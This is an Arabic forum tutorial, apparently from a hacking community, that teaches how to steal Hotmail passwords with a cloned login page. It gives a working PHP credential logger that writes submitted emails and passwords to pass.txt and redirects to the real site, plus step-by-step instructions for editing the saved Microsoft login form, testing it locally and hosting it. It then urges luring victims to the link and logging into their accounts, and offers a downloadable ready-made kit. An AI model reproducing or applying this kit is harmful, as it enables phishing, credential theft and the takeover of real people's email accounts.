نسأل الله أن تكونوا على خير حال إنشاء الله ، موضوعنا اليوم مهم جداً ويحتاج تركيز ، سنتناول إنشاء الله طريقة من طرق اختراق الهوتميل باحتراف وسيتم الشرح بالتفصيل بإذن الله ... لنتابع
أول خطوة سوف نقوم بها هي فتح المفكرة ( notepad) ونسخ الكود التالي ولصقه داخل المفكرة :
كود:
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
$redirect = "http://login.live.com/login.srf?wa=w...4855&mkt=en-US";
header("********:$redirect");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
طبعاً راح تقولوا هذا كود ايش ؟
أقلكم هذا هو الكود الذهبي إلى راح يرسل التبليغ لنا ، طيب بعد ماقمنا بنسخة ولصقه في المفكرة نقوم بحفظه باسم ( login.php ) وامتداده اعتقد واضح ومع ذلك نحط صورة توضيحيه لعيونكم :
طيب بكذا انهينا الخطوة الأولى ، وننتقل للخطوة الثانية وهي الصفحة ، نروح للمتصفح ونفتح صفحة تسجيل الهوتميل
كود:
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1258901240&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&id=64855&mkt=en-us&lc=1025بعد فتح صفحة التسجيل نقوم بحفظها اضغط على ( ctrl+s) اذا متصفحك فايرفوكس
صورة توضيحية
بعد حفظنا للصفحة نقوم بفتحها باستخدام الفكرة ( notepad ) ونقوم بالبحث عن كلمة ( action ) وعندما نجدها نقوم بتغيير العبارة التي أمامها إلى اسم الملف الذي حفظناه في الخطوة الأولى ( login.php ) كما نقوم بالبحث عن كلمة ( post ) وعادة تاتي قبل كلمة أكشن ونقوم بتغييرها إلى كلمة ( get ) ومن ثم نقوم بحفظ التعديلات ...
صورة توضيحية الصفحة قبل التعديل
صورة توضيحية الصفحة بعد التعديل
إلى هنا نكون قطعنا مرحلة جيدة وأصبح لدينا ملفين الأول كود التبليغ والثاني الصفحة ، قبل مانقوم برفعها على استضافة راح نقوم بتجربة العملية على أنفسنا ونشوف ايش النتيجه راح نستخدم برنامج WampServer وهو عبارة عن برنامج سرفر شخصي ...
تحميل البرنامج
بعد تحميل البرنامج وتنصيبه راح ينزل في السي نقوم بفتح السي ومنه نقوم بفتح مجلد wamp ومنه نقوم بفتح مجلد www راح نجد داخله ملف باسم اندكس نقوم بتغيير اسمه الى اي شي حتى لايتعارض مع اسم صفحتنا ، بعد ذلك نقوم بنقل الملفين الذي كوناها في الخطوتين السابقة إلى داخل هذا المجلد ...
صورة توضيحية للمجلد قبل نقل الملفات إليه
صورة توضيحية للمجلد بعد نقل الملفات إليه
[
بعد ذلك نذهب إلى المتصفح ونقوم بكتابة الرابط التالي في العنوان :
كود:
http://127.0.0.1/سنجد أن المتصفح قام بفتح صفحتنا المزورة التي وضعناها سابقاً في مجلد www بداخل مجلد السرفر الشخصي ، نقوم بإجراء التجربة ونرى ماذا ينتج ، نقوم بوضع أي عنوان ايميل ونقوم بوضع أي كلمة مرور ومن ثم نقوم بالضغط على signin ونتابع ماذا حدث ....
صور توضيحية
[CENTER]
ياسلام أعتقد شغل نظيف وأخر حلاوة وتبليغ ولا أحلى ولا أسرع من كذا صارووووووخ أرض- أرض ...
طيب بعد ما اتأكدنا أن الصفحة تمام والتبليغ مية مية ، نقوم برفع الثلاث ملفات ( index.php - login.php -pass ) إلى مساحتنا المجانية وأعتقد الكل يعرف كيف يعمله مساحة مجانية ، بعد الرفع نقوم بتجربة الصفحة على أنفسنا والنتائج راح تعجبكم إنشاء الله ...، بعد ذلك تبدأ عملية التخطيط لاختراق ايميلات الضحايا من خلال ارسال روابط الصفحة لهم وهذه العملية تعتمد على ذكائك في اقناع الضحية لضغطه على الرابط وفي نفس الوقت يجب أن تكون مستعد عند ملف الباس المرفوع لكي تشاهد معلومات الضحية ومن ثم الذهاب مسرعا لتسجيل دخولك لإيميله
لحظة الموضوع ماأنتهى لاكن أخوكم تعب فاعذروني ، إنشاء الله راح أكمل الموضوع باضافة طريقة أخرى للإختراق بالصفحة المزورة
والأن قبل مانختم الموضوع ، يطيب لي أن أرفق لكم صفحة الهوتميل المزورة وكود التبليغ من انتاج مختبرات جيوش الهكر وقد أثبتت فعاليتها الحمد لله ....
التحميل
باسوورد فك الضغط لكافة البرامج في الموضوع